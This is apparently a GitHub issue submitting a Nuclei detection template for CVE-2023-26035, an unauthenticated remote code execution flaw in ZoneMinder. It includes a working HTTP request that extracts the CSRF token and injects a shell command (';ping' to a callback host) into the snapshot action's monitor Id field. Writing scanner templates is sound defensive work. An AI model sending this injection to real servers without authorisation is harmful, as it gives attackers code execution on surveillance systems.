### ISSUE TITLE
CVE-2023-26035

### ISSUE THREAD

**Issue by In1t0** [projectdiscovery/nuclei-templates#8816]
### Template Information:
zoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution via Missing Authorization. There are no permissions check on the snapshot action, which expects an id to fetch an existing monitor but can be passed an object to create a new one instead. TriggerOn ends up calling shell_exec using the supplied Id. This issue is fixed in This issue is fixed in versions 1.36.33 and 1.37.33.

[https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr](https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr)
[https://nvd.nist.gov/vuln/detail/CVE-2023-26035](https://nvd.nist.gov/vuln/detail/CVE-2023-26035)
[https://www.rapid7.com/db/modules/exploit/unix/webapp/zoneminder_snapshots/](https://www.rapid7.com/db/modules/exploit/unix/webapp/zoneminder_snapshots/)

### Nuclei Template:

```yaml
id: zoneminder-rce

info:
  name: ZoneMinder rce
  author: Unblvr1,whotwagner
  severity: critical
  description: ZoneMinder versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution due to missing authorization checks in the snapshot action.
  reference:
    - https://www.rapid7.com/db/modules/exploit/unix/webapp/zoneminder_snapshots/
  tags: rce,zoneminder

http:
  - raw:
    - |
      GET /index.php HTTP/1.1
      Host: {{Hostname}}
    - |
      POST /index.php HTTP/1.1
      Host: {{Hostname}}
      Content-Type: application/x-www-form-urlencoded

        view=snapshot&action=create&monitor_ids[0][Id]=;ping {{interactsh-url}}&__csrf_magic={{csrf_token}}

    extractors:
      - type: regex
        name: csrf_token
        part: body
        internal: true
        group: 1
        regex:
          - csrfMagicToken = \"(key:[a-f0-9]{40},\d+)

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
```
